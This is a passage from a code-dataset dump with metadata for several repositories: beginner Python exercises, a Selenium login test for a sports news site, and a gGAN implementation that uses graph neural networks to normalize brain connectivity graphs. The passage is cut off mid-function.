"text": "import random\n\n\ndef main():\n guesses = 0\n hidden = random.randrange(1, 100)\n guessing(guesses, hidden)\n\n\ndef guessing(guesses, hidden):\n while True:\n guess = int(raw_input(\"Please enter your guess between 1 and 100: \"))\n guesses += 1\n if guess == hidden:\n break\n elif guess < hidden:\n print \"That guess was too low\"\n else:\n print \"That guess was too high\"\n if guess == hidden:\n play_again = raw_input(\"Congrats you nailed it, it took you this many guesses: \" + str(guesses) +\n \"\\nPlay again? (y/n): \")\n if play_again == \"y\":\n main()\n else:\n print(\"Ok Game Over\")\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6440129280090332,
"alphanum_fraction": 0.6440129280090332,
"avg_line_length": 36.272727966308594,
"blob_id": "cf6a7be49e9e5e975b770c2ce26e1c3543204578",
"content_id": "08cfdc736149284503800dbb66327797954c131f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1236,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 33,
"path": "/bleacher_report/bleacher_report_selenium_project/src/locators.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "from selenium.webdriver.common.by import By\n\n\nclass HomePageLocators(object):\n HOME_BUTTON = (By.ID, 'br-logo')\n LOGIN_BUTTON = (By.CLASS_NAME, 'login')\n SIGN_UP_BUTTON = (By.CLASS_NAME, 'sign-up')\n\n\nclass LoginPageLocators(object):\n LOGIN_METHOD_PAGE = (By.CLASS_NAME, 'chooseLoginMethod')\n EMAIL_LOGIN_PAGE = (By.CLASS_NAME, 'emailLoginForm')\n EMAIL_SIGN_IN = (By.CLASS_NAME, 'email')\n EMAIL_INPUT = (By.NAME, 'email')\n PASSWORD_INPUT = (By.NAME, 'password')\n SIGN_IN = (By.CLASS_NAME, 'submit')\n FORGOT_PASSWORD = (By.CLASS_NAME, 'forgot')\n ERROR_MESSAGE = (By.CLASS_NAME, 'errorMessage')\n\n\nclass SignUpPageLocators(object):\n SIGN_UP_PAGE = (By.CLASS_NAME, 'signupPage')\n SIGN_UP_WITH_EMAIL = (By.CLASS_NAME, 'email')\n FIRST_NAME = (By.NAME, 'first_name')\n LAST_NAME = (By.NAME, 'last_name')\n NAMES_PAGE = (By.CLASS_NAME, 'enterYourNames')\n CONTINUE = (By.XPATH, '//button[contains(text(),\"Continue\")]')\n USERNAME_PAGE = (By.CLASS_NAME, 'pickUserName')\n USERNAME_INPUT = (By.NAME, 'username')\n EMAIL_INPUT = (By.NAME, 'email')\n PASSWORD_INPUT = (By.NAME, 'password')\n EMAIL_SIGN_UP_PAGE = (By.CLASS_NAME, 'emailSignup')\n BACK = (By.CLASS_NAME, 'flowBack')\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.8175438642501831,
"alphanum_fraction": 0.8280701637268066,
"avg_line_length": 94,
"blob_id": "eb30b5f7c668402c15a7e5323ae09a8224f828c4",
"content_id": "99259d1966c89e725e540876218c13dd3086b7b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 3,
"path": "/README.md",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "# code_test\nIt will require selenium to be installed\nIncluded is chromedriver for chrome version 75 under the bleacher_report_selenium_project portion of the project, replace with different version if necessary. The 3 excersises are in the bleacher_report_tests portion of the project\n"
},
{
"alpha_fraction": 0.5613811016082764,
"alphanum_fraction": 0.5843989849090576,
"avg_line_length": 29.076923370361328,
"blob_id": "e57037ac2147ff4973195e9fe1a4259d0092699e",
"content_id": "73caf39e0a87fa1ee9552979e488efd57c5d1b30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 26,
"path": "/bleacher_report/bleacher_report_tests/divisibility.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "def main():\n first = int(input(\"Enter a number between 1 and 100: \"))\n second = int(input(\"Enter another number between 1 and 100: \"))\n third = int(input(\"Enter yet another number between 1 and 100: \"))\n print \"Here are the numbers evenly divisible by at least 1 in that range for those 3 numbers (duplicates removed)\"\n print divisibility_check(first, second, third)\n\n\ndef divisibility_check(a, b, c):\n number_list = [a, b, c]\n lower = 1\n upper = 100\n results = []\n\n for i in number_list:\n for j in range(lower, upper):\n if i * j <= upper:\n result = i * j\n if result not in results:\n results.append(result)\n results.sort()\n return results\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6530958414077759,
"alphanum_fraction": 0.6530958414077759,
"avg_line_length": 31.75,
"blob_id": "4499e04bbc1b12c31b544ce3aead1b0597ce921c",
"content_id": "869868cd3f1a4f22448a1598c231869601eff604",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1179,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 36,
"path": "/bleacher_report/bleacher_report_selenium_project/src/login_spec.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nimport page\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\nclass LoginSpec(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=dir_path + '/../chromedriver')\n self.driver.get(\"http://www.bleacherreport.com\")\n\n def testLoginPage(self):\n dummy_email = \"[email protected]\"\n dummy_password = \"letmein\"\n main_page = page.HomePage(self.driver)\n\n # Navigate to login page\n main_page.select_login()\n login_page = page.LoginPage(self.driver)\n assert login_page.is_login_method_page_displayed(), \"Login method page did not display.\"\n # Navigate to login by email\n login_page.select_email_login()\n assert login_page.is_email_login_page_displayed(), \"Email login page did not display.\"\n login_page.input_email(dummy_email)\n login_page.input_password(dummy_password)\n login_page.sign_in()\n assert login_page.is_error_message_displayed(), \"Error message for login did not display.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.6283292770385742,
"alphanum_fraction": 0.6283292770385742,
"avg_line_length": 28.5,
"blob_id": "4bf6789a4f635d4aa2a4fc40420d95a797c82323",
"content_id": "0033982b0094f18aad49b6cc0588d4257a5302e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 826,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 28,
"path": "/bleacher_report/bleacher_report_tests/common_words.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "# A few examples here of different functions to accomplish the word compare\ndef main():\n list_a = [\"trying\", \"to\", \"think\", \"of\", \"a\", \"song\", \"lyric\"]\n list_b = [\"unfortunately\", \"no\", \"lyric\", \"for\", \"any\", \"song\", \"comes\", \"to\", \"mind\"]\n print \"A few different ways to do it: \"\n print compare(list_a, list_b)\n print compare_efficiently(list_a, list_b)\n print compare_efficiently_reversed(list_a, list_b)\n\n\ndef compare(first, second):\n return list(set(first) & set(second))\n\n\ndef compare_efficiently(list_a, list_b):\n tmp = set(list_a)\n list_c = [value for value in list_b if value in tmp]\n return list_c\n\n\ndef compare_efficiently_reversed(list_a, list_b):\n tmp = set(list_b)\n list_c = [value for value in list_a if value in tmp]\n return list_c\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 10 |
zeynepgurler/gGAN
|
https://github.com/zeynepgurler/gGAN
|
ee5cc0fc1c9e9ba779a2af2789e9b802207d7bce
|
07a8700376a3c8a101da4dc9dec4fccff28a36f4
|
085a315a940190f2355d1f880270e68c9ec6f56d
|
refs/heads/master
| 2022-12-19T16:11:23.500916 | 2020-10-10T07:33:38 | 2020-10-10T07:33:38 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5353962182998657,
"alphanum_fraction": 0.5506756901741028,
"avg_line_length": 38.067691802978516,
"blob_id": "0f5c0819b0a3644e1d4d2778447270a17225bbc9",
"content_id": "308ac2aef2cf6d55104f2170556733b08ec1563e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13024,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 325,
"path": "/demo.py",
"repo_name": "zeynepgurler/gGAN",
"src_encoding": "UTF-8",
"text": "import argparse\r\nimport os\r\nimport pdb\r\nimport numpy as np\r\nimport math\r\nimport itertools\r\nimport torch\r\nfrom torch.nn import Sequential, Linear, ReLU, Sigmoid, Tanh, Dropout\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom torch_geometric.data import Data\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch_geometric.nn import NNConv\r\nfrom torch_geometric.nn import BatchNorm, EdgePooling, TopKPooling, global_add_pool\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.stats as stats\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport random\r\nfrom gGAN import gGAN, netNorm\r\n\r\ntorch.cuda.empty_cache()\r\ntorch.cuda.empty_cache()\r\n\r\n# random seed\r\nmanualSeed = 1\r\n\r\nnp.random.seed(manualSeed)\r\nrandom.seed(manualSeed)\r\ntorch.manual_seed(manualSeed)\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda')\r\n print('running on GPU')\r\n # if you are using GPU\r\n torch.cuda.manual_seed(manualSeed)\r\n torch.cuda.manual_seed_all(manualSeed)\r\n\r\n torch.backends.cudnn.enabled = False\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n print('running on CPU')\r\n\r\n\r\ndef demo():\r\n def cast_data(array_of_tensors, version):\r\n version1 = torch.tensor(version, dtype=torch.int)\r\n\r\n N_ROI = array_of_tensors[0].shape[0]\r\n CHANNELS = 1\r\n dataset = []\r\n edge_index = torch.zeros(2, N_ROI * N_ROI)\r\n edge_attr = torch.zeros(N_ROI * N_ROI, CHANNELS)\r\n x = torch.zeros((N_ROI, N_ROI)) # 35 x 35\r\n y = torch.zeros((1,))\r\n\r\n counter = 0\r\n for i in range(N_ROI):\r\n for j in range(N_ROI):\r\n edge_index[:, counter] = torch.tensor([i, j])\r\n counter += 1\r\n for mat in array_of_tensors: # 1,35,35,4\r\n\r\n if version1 == 0:\r\n edge_attr = mat.view(1225, 1)\r\n x = mat.view(nbr_of_regions, nbr_of_regions)\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n elif version1 == 1:\r\n edge_attr = torch.randn(N_ROI * N_ROI, CHANNELS)\r\n x = torch.randn(N_ROI, N_ROI) # 35 x 35\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n return dataset\r\n\r\n #####################################################################################################\r\n\r\n def linear_features(data):\r\n n_roi = data[0].shape[0]\r\n n_sub = data.shape[0]\r\n counter = 0\r\n\r\n num_feat = (n_roi * (n_roi - 1) // 2)\r\n final_data = np.empty([n_sub, num_feat], dtype=float)\r\n for k in range(n_sub):\r\n for i in range(n_roi):\r\n for j in range(i+1, n_roi):\r\n final_data[k, counter] = data[k, i, j]\r\n counter += 1\r\n counter = 0\r\n\r\n return final_data\r\n\r\n def make_sym_matrix(nbr_of_regions, feature_vector):\r\n sym_matrix = np.zeros([9, feature_vector.shape[1], nbr_of_regions, nbr_of_regions], dtype=np.double)\r\n for j in range(9):\r\n for i in range(feature_vector.shape[1]):\r\n my_matrix = np.zeros([nbr_of_regions, nbr_of_regions], dtype=np.double)\r\n\r\n my_matrix[np.triu_indices(nbr_of_regions, k=1)] = feature_vector[j, i, :]\r\n my_matrix = my_matrix + my_matrix.T\r\n my_matrix[np.diag_indices(nbr_of_regions)] = 0\r\n sym_matrix[j, i,:,:] = my_matrix\r\n\r\n return sym_matrix\r\n\r\n def plot_predictions(predicted, fold):\r\n plt.clf()\r\n for j in range(predicted.shape[0]):\r\n for i in range(predicted.shape[1]):\r\n predicted_sub = predicted[j, i, :, :]\r\n plt.pcolor(abs(predicted_sub))\r\n if(j == 0 and i == 0):\r\n plt.colorbar()\r\n plt.imshow(predicted_sub)\r\n plt.savefig('./plot/img' + str(fold) + str(j) + str(i) + '.png')\r\n\r\n def plot_MAE(prediction, data_next, test, fold):\r\n # mae\r\n MAE = np.zeros((9), dtype=np.double)\r\n for i in range(9):\r\n MAE_i = abs(prediction[i, :, :] - data_next[test])\r\n MAE[i] = np.mean(MAE_i)\r\n\r\n plt.clf()\r\n k = ['k=2', 'k=3', 'k=4', 'k=5', 'k=6', 'k=7', 'k=8', 'k=9', 'k=10']\r\n sns.set(style=\"whitegrid\")\r\n\r\n df = pd.DataFrame(dict(x=k, y=MAE))\r\n # total = sns.load_dataset('tips')\r\n ax = sns.barplot(x=\"x\", y=\"y\", data=df)\r\n min = MAE.min() - 0.01\r\n max = MAE.max() + 0.01\r\n ax.set(ylim=(min, max))\r\n plt.savefig('./plot/mae' + str(fold) + '.png')\r\n\r\n ######################################################################################################################################\r\n\r\n class Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n\r\n nn = Sequential(Linear(1, 1225), ReLU())\r\n self.conv1 = NNConv(35, 35, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(35, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, 35), ReLU())\r\n self.conv2 = NNConv(35, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, 35), ReLU())\r\n self.conv3 = NNConv(1, 35, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv33 = BatchNorm(35, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n\r\n x1 = F.sigmoid(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x1 = F.dropout(x1, training=self.training)\r\n\r\n x2 = F.sigmoid(self.conv22(self.conv2(x1, edge_index, edge_attr)))\r\n x2 = F.dropout(x2, training=self.training)\r\n\r\n embedded = x2.detach().cpu().clone().numpy()\r\n\r\n return embedded\r\n\r\n def embed(Casted_source):\r\n embedded_data = np.zeros((1, 35), dtype=float)\r\n i = 0\r\n for data_A in Casted_source: ## take a subject from source and target data\r\n embedded = generator(data_A) # 35 x35\r\n\r\n if i == 0:\r\n embedded = np.transpose(embedded)\r\n embedded_data = embedded\r\n else:\r\n embedded = np.transpose(embedded)\r\n embedded_data = np.append(embedded_data, embedded, axis=0)\r\n i = i + 1\r\n return embedded_data\r\n\r\n def test_gGAN(data_next, embedded_train_data, embedded_test_data, embedded_CBT):\r\n def x_to_x(x_train, x_test, nbr_of_trn, nbr_of_tst):\r\n result = np.empty((nbr_of_tst, nbr_of_trn), dtype=float)\r\n for i in range(nbr_of_tst):\r\n x_t = np.transpose(x_test[i])\r\n for j in range(nbr_of_trn):\r\n result[i, j] = np.matmul(x_train[j], x_t)\r\n return result\r\n\r\n def check(neighbors, i, j):\r\n for val in neighbors[i, :]:\r\n if val == j:\r\n return 1\r\n return 0\r\n\r\n def k_neighbors(x_to_x, k_num, nbr_of_trn, nbr_of_tst):\r\n neighbors = np.zeros((nbr_of_tst, k_num), dtype=int)\r\n used = np.zeros((nbr_of_tst, nbr_of_trn), dtype=int)\r\n current = 0\r\n for i in range(nbr_of_tst):\r\n for k in range(k_num):\r\n for j in range(nbr_of_trn):\r\n if abs(x_to_x[i, j]) > current:\r\n if check(neighbors, i, j) == 0:\r\n neighbors[i, k] = j\r\n current = abs(x_to_x[i, neighbors[i, k]])\r\n current = 0\r\n\r\n return neighbors\r\n\r\n def subtract_cbt(x, cbt, length):\r\n for i in range(length):\r\n x[i] = abs(x[i] - cbt[0])\r\n\r\n return x\r\n\r\n def predict_samples(k_neighbors, t1, nbr_of_tst):\r\n average = np.zeros((nbr_of_tst, 595), dtype=float)\r\n for i in range(nbr_of_tst):\r\n for j in range(len(k_neighbors[0])):\r\n average[i] = average[i] + t1[k_neighbors[i,j],:]\r\n\r\n average[i] = average[i] / len(k_neighbors[0])\r\n\r\n return average\r\n\r\n residual_of_tr_embeddings = subtract_cbt(embedded_train_data, embedded_CBT, len(embedded_train_data))\r\n residual_of_ts_embeddings = subtract_cbt(embedded_test_data, embedded_CBT, len(embedded_test_data))\r\n\r\n dot_of_residuals = x_to_x(residual_of_tr_embeddings, residual_of_ts_embeddings, len(train), len(test))\r\n for k in range(2, 11):\r\n k_neighbors_ = k_neighbors(dot_of_residuals, k, len(train), len(test))\r\n\r\n if k == 2:\r\n prediction = predict_samples(k_neighbors_, data_next, len(embedded_test_data))\r\n prediction = np.reshape(prediction, (1, len(embedded_test_data), nbr_of_feat))\r\n else:\r\n new_predict = predict_samples(k_neighbors_, data_next, len(embedded_test_data))\r\n new_predict = np.reshape(new_predict, (1, len(embedded_test_data), nbr_of_feat))\r\n prediction = np.append(prediction, new_predict, axis=0)\r\n\r\n return prediction\r\n\r\n nbr_of_sub = int(input('Please select the number of subjects: '))\r\n if nbr_of_sub < 5:\r\n print(\"You can not give less than 5 to the number of subjects. \")\r\n nbr_of_sub = int(input('Please select the number of subjects: '))\r\n nbr_of_regions = int(input('Please select the number of regions: '))\r\n nbr_of_epochs = int(input('Please select the number of epochs: '))\r\n nbr_of_folds = int(input('Please select the number of folds: '))\r\n hyper_param1 = 100\r\n nbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\n nbr_of_sub_for_cbt = int(nbr_of_sub // 5) # CBT will be generated by %20 of the number of subjects.\r\n print(nbr_of_sub_for_cbt)\r\n\r\n data = np.random.normal(0.6, 0.3, (nbr_of_sub, nbr_of_regions, nbr_of_regions))\r\n independent_data = np.random.normal(0.6, 0.3, (nbr_of_sub_for_cbt, nbr_of_regions, nbr_of_regions))\r\n data_next = np.random.normal(0.4, 0.3, (nbr_of_sub, nbr_of_regions, nbr_of_regions))\r\n CBT = netNorm(independent_data, nbr_of_sub_for_cbt, nbr_of_regions)\r\n gGAN(data, nbr_of_regions, nbr_of_epochs, nbr_of_folds, hyper_param1, CBT)\r\n\r\n # embed train and test subjects\r\n kfold = KFold(n_splits=nbr_of_folds, shuffle=True, random_state=manualSeed)\r\n\r\n source_data = torch.from_numpy(data) # convert numpy array to torch tensor\r\n source_data = source_data.type(torch.FloatTensor)\r\n\r\n target_data = np.reshape(CBT, (1, nbr_of_regions, nbr_of_regions, 1))\r\n target_data = torch.from_numpy(target_data) # convert numpy array to torch tensor\r\n target_data = target_data.type(torch.FloatTensor)\r\n\r\n i = 1\r\n for train, test in kfold.split(source_data):\r\n adversarial_loss = torch.nn.BCELoss()\r\n l1_loss = torch.nn.L1Loss()\r\n trained_model_gen = torch.load('./weight_' + str(i) + 'generator_.model')\r\n generator = Generator()\r\n generator.load_state_dict(trained_model_gen)\r\n\r\n train_data = source_data[train]\r\n test_data = source_data[test]\r\n\r\n generator.to(device)\r\n adversarial_loss.to(device)\r\n l1_loss.to(device)\r\n\r\n X_train_casted_source = [d.to(device) for d in cast_data(train_data, 0)]\r\n X_test_casted_source = [d.to(device) for d in cast_data(test_data, 0)]\r\n data_B = [d.to(device) for d in cast_data(target_data, 0)]\r\n\r\n embedded_train_data = embed(X_train_casted_source)\r\n embedded_test_data = embed(X_test_casted_source)\r\n embedded_CBT = embed(data_B)\r\n\r\n if i == 1:\r\n data_next = linear_features(data_next)\r\n predicted_flat = test_gGAN(data_next, embedded_train_data, embedded_test_data, embedded_CBT)\r\n\r\n plot_MAE(predicted_flat, data_next, test, i)\r\n i = i + 1\r\n\r\n predicted = make_sym_matrix(nbr_of_regions, predicted_flat)\r\n plot_predictions(predicted, i - 1)\r\n\r\ndemo()\r\n\r\n"
},
{
"alpha_fraction": 0.5558170676231384,
"alphanum_fraction": 0.5693501234054565,
"avg_line_length": 40.883026123046875,
"blob_id": "231ad0a3866bdded67d09c25f774cd36df398b81",
"content_id": "80390cd6e8a6a9135f8e188a901f7cfec87b4200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18697,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 436,
"path": "/gGAN.py",
"repo_name": "zeynepgurler/gGAN",
"src_encoding": "UTF-8",
"text": "\"\"\"Main function of gGAN for the paper: Foreseeing Brain Graph Evolution Over Time\r\nUsing Deep Adversarial Network Normalizer\r\n Details can be found in: (https://arxiv.org/abs/2009.11166)\r\n (1) the original paper .\r\n ---------------------------------------------------------------------\r\n This file contains the implementation of two key steps of our gGAN framework:\r\n netNorm(v, nbr_of_sub, nbr_of_regions)\r\n Inputs:\r\n v: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n Output:\r\n CBT: (t x t) matrix representing the connectional brain template\r\n\r\n gGAN(sourceGraph, nbr_of_regions, nbr_of_folds, nbr_of_epochs, hyper_param1, CBT)\r\n Inputs:\r\n sourceGraph: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n CBT: (t x t) matrix stacking the connectional brain template generated by netNorm\r\n\r\n Output:\r\n translatedGraph: (t x t) matrix stacking the graph translated into CBT\r\n\r\n This code has been slightly modified to be compatible across all PyTorch versions.\r\n\r\n (2) Dependencies: please install the following libraries:\r\n - matplotlib\r\n - numpy\r\n - scikitlearn\r\n - pytorch\r\n - pytorch-geometric\r\n - pytorch-scatter\r\n - pytorch-sparse\r\n - scipy\r\n\r\n ---------------------------------------------------------------------\r\n Copyright 2020 ().\r\n Please cite the above paper if you use this code.\r\n All rights reserved.\r\n \"\"\"\r\n\r\n\r\n# If you are using Google Colab please uncomment the three following lines.\r\n# !pip install torch_geometric\r\n# !pip install torch-sparse==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n# !pip install torch-scatter==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n\r\n\r\nimport argparse\r\nimport os\r\nimport pdb\r\nimport numpy as np\r\nimport math\r\nimport itertools\r\nimport torch\r\nfrom torch.nn import Sequential, Linear, ReLU, Sigmoid, Tanh, Dropout\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom torch_geometric.data import Data\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch_geometric.nn import NNConv\r\nfrom torch_geometric.nn import BatchNorm, EdgePooling, TopKPooling, global_add_pool\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.stats as stats\r\nimport random\r\n\r\nimport seaborn as sns\r\n\r\ntorch.cuda.empty_cache()\r\ntorch.cuda.empty_cache()\r\n\r\n# random seed\r\nmanualSeed = 1\r\n\r\nnp.random.seed(manualSeed)\r\nrandom.seed(manualSeed)\r\ntorch.manual_seed(manualSeed)\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda')\r\n print('running on GPU')\r\n # if you are using GPU\r\n torch.cuda.manual_seed(manualSeed)\r\n torch.cuda.manual_seed_all(manualSeed)\r\n\r\n torch.backends.cudnn.enabled = False\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n print('running on CPU')\r\n\r\ndef netNorm(v, nbr_of_sub, nbr_of_regions):\r\n nbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\n\r\n def upper_triangular():\r\n All_subj = np.zeros((nbr_of_sub, nbr_of_feat))\r\n for j in range(nbr_of_sub):\r\n subj_x = v[j, :, :]\r\n subj_x = np.reshape(subj_x, (nbr_of_regions, nbr_of_regions))\r\n subj_x = subj_x[np.triu_indices(nbr_of_regions, k=1)]\r\n subj_x = np.reshape(subj_x, (1, nbr_of_feat))\r\n All_subj[j, :] = subj_x\r\n\r\n return All_subj\r\n\r\n def distances_inter(All_subj):\r\n theta = 0\r\n distance_vector = np.zeros(1)\r\n distance_vector_final = np.zeros(1)\r\n x = All_subj\r\n for i in range(nbr_of_feat):\r\n ROI_i = x[:, i]\r\n for j in range(nbr_of_sub):\r\n subj_j = ROI_i[j:j+1]\r\n\r\n distance_euclidienne_sub_j_sub_k = 0\r\n for k in range(nbr_of_sub):\r\n if k != j:\r\n subj_k = ROI_i[k:k+1]\r\n\r\n distance_euclidienne_sub_j_sub_k = distance_euclidienne_sub_j_sub_k + np.square(subj_k - subj_j)\r\n theta +=1\r\n if j == 0:\r\n distance_vector = np.sqrt(distance_euclidienne_sub_j_sub_k)\r\n else:\r\n distance_vector = np.concatenate((distance_vector, np.sqrt(distance_euclidienne_sub_j_sub_k)), axis=0)\r\n\r\n distance_vector = np.reshape(distance_vector, (nbr_of_sub, 1))\r\n if i == 0:\r\n distance_vector_final = distance_vector\r\n else:\r\n distance_vector_final = np.concatenate((distance_vector_final, distance_vector), axis=1)\r\n\r\n print(theta)\r\n return distance_vector_final\r\n\r\n\r\n def minimum_distances(distance_vector_final):\r\n x = distance_vector_final\r\n\r\n for i in range(nbr_of_feat):\r\n minimum_sub = x[0, i:i+1]\r\n minimum_sub = float(minimum_sub)\r\n for k in range(1, nbr_of_sub):\r\n local_sub = x[k:k+1, i:i+1]\r\n local_sub = float(local_sub)\r\n if local_sub < minimum_sub:\r\n general_minimum = k\r\n general_minimum = np.array(general_minimum)\r\n minimum_sub = local_sub\r\n if i == 0:\r\n final_general_minimum = np.array(general_minimum)\r\n else:\r\n final_general_minimum = np.vstack((final_general_minimum, general_minimum))\r\n\r\n final_general_minimum = np.transpose(final_general_minimum)\r\n\r\n return final_general_minimum\r\n\r\n def new_tensor(final_general_minimum, All_subj):\r\n y = All_subj\r\n x = final_general_minimum\r\n for i in range(nbr_of_feat):\r\n optimal_subj = x[:, i:i+1]\r\n optimal_subj = np.reshape(optimal_subj, (1))\r\n optimal_subj = int(optimal_subj)\r\n if i == 0:\r\n final_new_tensor = y[optimal_subj: optimal_subj+1, i:i+1]\r\n else:\r\n final_new_tensor = np.concatenate((final_new_tensor, y[optimal_subj: optimal_subj+1, i:i+1]), axis=1)\r\n\r\n return final_new_tensor\r\n\r\n def make_sym_matrix(nbr_of_regions, feature_vector):\r\n my_matrix = np.zeros([nbr_of_regions, nbr_of_regions], dtype=np.double)\r\n\r\n my_matrix[np.triu_indices(nbr_of_regions, k=1)] = feature_vector\r\n my_matrix = my_matrix + my_matrix.T\r\n my_matrix[np.diag_indices(nbr_of_regions)] = 0\r\n\r\n return my_matrix\r\n\r\n def re_make_tensor(final_new_tensor, nbr_of_regions):\r\n x = final_new_tensor\r\n #x = np.reshape(x, (nbr_of_views, nbr_of_feat))\r\n\r\n x = make_sym_matrix(nbr_of_regions, x)\r\n x = np.reshape(x, (1, nbr_of_regions, nbr_of_regions))\r\n\r\n return x\r\n\r\n Upp_trig = upper_triangular()\r\n Dis_int = distances_inter(Upp_trig)\r\n Min_dis = minimum_distances(Dis_int)\r\n New_ten = new_tensor(Min_dis, Upp_trig)\r\n Re_ten = re_make_tensor(New_ten, nbr_of_regions)\r\n Re_ten = np.reshape(Re_ten, (nbr_of_regions, nbr_of_regions))\r\n np.fill_diagonal(Re_ten, 0)\r\n network = np.array(Re_ten)\r\n return network\r\n\r\ndef gGAN(data, nbr_of_regions, nbr_of_epochs, nbr_of_folds, hyper_param1, CBT):\r\n def cast_data(array_of_tensors, version):\r\n version1 = torch.tensor(version, dtype=torch.int)\r\n\r\n N_ROI = array_of_tensors[0].shape[0]\r\n CHANNELS = 1\r\n dataset = []\r\n edge_index = torch.zeros(2, N_ROI * N_ROI)\r\n edge_attr = torch.zeros(N_ROI * N_ROI, CHANNELS)\r\n x = torch.zeros((N_ROI, N_ROI)) # 35 x 35\r\n y = torch.zeros((1,))\r\n\r\n counter = 0\r\n for i in range(N_ROI):\r\n for j in range(N_ROI):\r\n edge_index[:, counter] = torch.tensor([i, j])\r\n counter += 1\r\n for mat in array_of_tensors: #1,35,35,4\r\n\r\n if version1 == 0:\r\n edge_attr = mat.view((nbr_of_regions*nbr_of_regions), 1)\r\n x = mat.view(nbr_of_regions, nbr_of_regions)\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n elif version1 == 1:\r\n edge_attr = torch.randn(N_ROI * N_ROI, CHANNELS)\r\n x = torch.randn(N_ROI, N_ROI) # 35 x 35\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n return dataset\r\n\r\n # ------------------------------------------------------------\r\n\r\n def 